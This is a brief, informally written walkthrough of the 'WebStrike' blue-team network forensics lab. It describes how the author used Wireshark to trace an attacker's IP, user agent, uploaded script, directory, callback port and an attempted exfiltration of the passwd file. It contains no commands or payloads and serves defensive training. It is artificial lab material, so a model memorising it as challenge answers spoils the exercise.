WebStrike Blue Team Lab

Network Forensics lab

1- Firstly to detect the attacker Let`s check Conversations tab on Wireshark and after get it i check ipgeolocation website to detect the city

2- As in the Scenario the attacker use a script i add the attacker ip as a filter and search for admin wish is the most common word use in the script and analyze the request to detect the user agent

3-To detect the script name i Check requests tab and it` s easy by the way

4-To Detect the the directory i used a filter the destination port and the request method GET

5-let`s detect the port and i reverse the filter to make it Source not Destination and this is for know witch port is communicated with this script

6-To Identify wich file the attacker try exfiltrate i follow the tcp stream and increase the stream sequence till reach the fill wich is Passwd a this is a serious attacker by the way (: